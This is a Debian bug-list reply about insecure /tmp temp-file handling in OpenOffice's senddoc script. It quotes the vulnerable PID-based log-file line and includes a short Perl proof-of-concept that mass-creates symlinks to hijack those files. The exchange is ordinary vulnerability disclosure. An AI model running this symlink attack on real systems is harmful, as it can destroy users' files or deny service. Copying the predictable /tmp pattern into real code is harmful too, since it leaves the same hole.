Bug#496361: The possibility of attack with the help of symlinks in some Debian packages

To: Rene Engelhard <rene@debian.org>
Subject: Bug#496361: The possibility of attack with the help of symlinks in some Debian packages
From: "Dmitry E. Oboukhov" <dimka@uvw.ru>
Date: Mon, 25 Aug 2008 11:16:02 +0400
Message-id: <[🔎] 20080825071602.GH3859@work.uvw.ru>
Reply-to: "Dmitry E. Oboukhov" <dimka@uvw.ru>, 496361@bugs.debian.org
In-reply-to: <[🔎] 20080825041338.GG29434@rene-engelhard.de>
References: <[🔎] E1KXJxw-0004HA-7s@nbw.dhome.lan> <[🔎] 20080825041338.GG29434@rene-engelhard.de>

On 06:13 Mon 25 Aug     , Rene Engelhard wrote:
RE> Hi,

RE> Dmitry E. Oboukhov wrote:
RE>> For example if a script uses in its work a temp file which is  created
RE>> in /tmp directory, then every user can create symlink  with  the  same
RE>> name in this directory in order to  destroy  or  rewrite  some  system
RE>> or user file.  Symlink attack may also  lead  not  only  to  the  data
RE>> desctruction but to denial of service as well.
RE>> 
RE>> Even if you create files or directories with help of function 'RANDOM'
RE>> or pid(), then your system is not protected. Attacker can create many
RE>> symlinks in order to destroy your data or create 'denial  of  service'
RE>> for your package scripts.
RE> [...]
RE>> Binary-package: openoffice.org-common (1:2.4.1-6)
RE>>     file: /usr/lib/openoffice/program/senddoc

RE> I guess you mean this snippet in the mutt handling part of senddoc?
    $ grep -A5 -B5 /tmp/ /usr/lib/openoffice/program/senddoc
    #!/bin/sh
    URI_ENCODE="`dirname $0`/uri-encode"
    
    echo "$@" > /tmp/log.obr.$$
    echo "$#" >> /tmp/log.obr.$$
    
    # tries to locate the executable specified 
    # as first parameter in the user's path.
    which() {
        if [ ! -z "$1" ]; then

example for attacker script:

#!...perl

$file_for_attack='/path/to/file';

while(1)
{
    exit unless fork;
    symlink $file_for_attack, "/tmp//tmp/log.obr.$_" for ($$ .. $$+10000);
}

RE> [...]
RE> --body)
RE> TEMPLATE="`basename $0`.mutt.XXXXXXXX"
RE> BODY=`mktemp -q -t ${TEMPLATE}`
RE> echo "$2" > $BODY
RE> shift
RE> [...]
RE> x-terminal-emulator -e ${MAILER} \
RE> ${FROM:+-e} ${FROM:+"set from=\"${FROM}\""} \
RE> ${CC:+-c} ${CC:+"${CC}"} \
RE> ${BCC:+-b} ${BCC:+"${BCC}"} \
RE> ${SUBJECT:+-s} ${SUBJECT:+"${SUBJECT}"} \
RE> ${BODY:+-i} ${BODY:+"${BODY}"} \
RE> ${ATTACH:+-a} ${ATTACH:+"${ATTACH}"} \
RE> ${TO:+"${TO}"} &
RE> rm -f $BODY
RE> [...]

RE> I so far thought mktemp was safe enough? (of course, we get
RE> senddoc.mutt.<number>, but...

RE> Regards,

RE> Rene
--

. ''`. Dmitry E. Oboukhov
: :’  : unera@debian.org
`. `~’ GPGKey: 1024D / F8E26537 2006-11-21
  `- 1B23 D4F8 8EC0 D902 0555  E438 AB8C 00CF F8E2 6537

Attachment: signature.asc
Description: Digital signature

Reply to:

Follow-Ups:
- Bug#496361: The possibility of attack with the help of symlinks in some Debian packages
  - From: Rene Engelhard <rene@debian.org>

References:
- Bug#496361: The possibility of attack with the help of symlinks in some Debian packages
  - From: "Dmitry E. Oboukhov" <dimka@uvw.ru>
- Bug#496361: The possibility of attack with the help of symlinks in some Debian packages
  - From: Rene Engelhard <rene@debian.org>

Prev by Date: Bug#496361: The possibility of attack with the help of symlinks in some Debian packages
Next by Date: ./packages/openofficeorg/3.0/experimental r1240: close #496480
Previous by thread: Bug#496361: The possibility of attack with the help of symlinks in some Debian packages
Next by thread: Bug#496361: The possibility of attack with the help of symlinks in some Debian packages
Index(es):
- Date
- Thread